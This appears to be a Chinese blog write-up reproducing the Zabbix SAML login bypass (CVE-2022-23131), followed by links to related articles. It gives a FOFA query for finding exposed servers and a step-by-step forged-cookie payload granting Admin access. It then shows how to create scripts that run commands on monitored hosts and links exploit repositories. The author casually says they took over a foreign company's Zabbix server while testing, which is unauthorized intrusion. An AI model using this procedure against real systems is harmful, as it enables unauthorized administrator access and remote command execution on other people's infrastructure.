Zabbix登录绕过漏洞复现(CVE-2022-23131)

简介: 最近在复现zabbix的漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。

0x01 漏洞原因
在启用 SAML SSO 身份验证(非默认)的情况下,恶意攻击者可以修改会话数据来实现身份认证绕过。未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。

该漏洞存在于index_sso.php文件中,由于index_sso.php文件未调用CEncryptedCookieSession::checkSign()方法对cookie进行校验,且客户端的cookie可被伪造。

从index_sso.php文件中可以看出,当伪造的cookie中存在saml_data时,获取username_attribute的数据,如果该用户真实存在则会生成一个sessionid从而实现身份认证绕过

0x02 漏洞影响
5.4.8

5.0.18

4.0.36

0x03 漏洞复现
fofa:app="ZABBIX-监控系统" && body="saml"
执行curl -ksSIL http://xxx.com/

image.png

获取到set-cookie的值,然后先进行url解码,然后再进行base64解码

URL解码:

eyJzZXNzaW9uaWQiOiIxNzFiODAwOTI4NDQ2MmUxZGRhODAyYWFjODk5MDI2YyIsInNpZ24iOiJ0eTZSZVkzVDRxVEdYenJseFM2ZlpyNTRhT3pCMHBhS25vWHBhZDR3MHdKc2lwNTJ2aUdndytDUlpqeVJyQUJ5WDk5bGhNMVVHbFM4cTRwNjBKb1wvUGc9PSJ9

Base64解码:

{"sessionid":"171b8009284462e1dda802aac899026c","sign":"ty6ReY3T4qTGXzrlxS6fZr54aOzB0paKnoXpad4w0wJsip52viGgw+CRZjyRrAByX99lhM1UGlS8q4p60Jo/Pg=="}

image.png

然后拼接字符串

{"saml_data":{"username_attribute":"Admin"},"sessionid":"171b8009284462e1dda802aac899026c","sign":"ty6ReY3T4qTGXzrlxS6fZr54aOzB0paKnoXpad4w0wJsip52viGgw+CRZjyRrAByX99lhM1UGlS8q4p60Jo/Pg=="}

拼接之后在进行base64加密

image.png

然后在进行URLEncode
image.png

image.png

image.png

image.png

找到Administration--> Scripts 创建新的脚本,这里我创建的ifconfig

image.png

image.png

在监控中找到最新数据,然后筛选出来你想执行的主机组,点击主机名执行对应命令

image.png

https://github.com/L0ading-x/cve-2022-23131
https://github.com/Mr-xn/cve-2022-23131

0x04 修复方法
1、禁用 SAML 身份验证

2、升级安全版本(https://support.zabbix.com/browse/ZBX-20350

相关文章
|
7月前
|
监控 安全 Shell
Zabbix Server trapper 命令注入漏洞 (CVE-2017-2824)
Zabbix Server trapper 命令注入漏洞,攻击者可通过特定Payload获取服务器执行权限。
107 1
|
4月前
|
监控 前端开发 应用服务中间件
Zabbix【部署 01】Zabbix企业级分布式监控系统部署配置使用实例(在线安装及问题处理)程序安装+数据库初始+前端配置+服务启动+Web登录
Zabbix【部署 01】Zabbix企业级分布式监控系统部署配置使用实例(在线安装及问题处理)程序安装+数据库初始+前端配置+服务启动+Web登录
415 0
|
存储 监控 安全
zabbix最新漏洞,可绕过认证登陆!
Zabbix对客户端提交的`Cookie`会话存在不安全的存储方式,导致在启动`SAML SSO`认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现`RCE`。
588 0
zabbix最新漏洞,可绕过认证登陆!
|
监控 Linux 机器学习/深度学习

推荐镜像

更多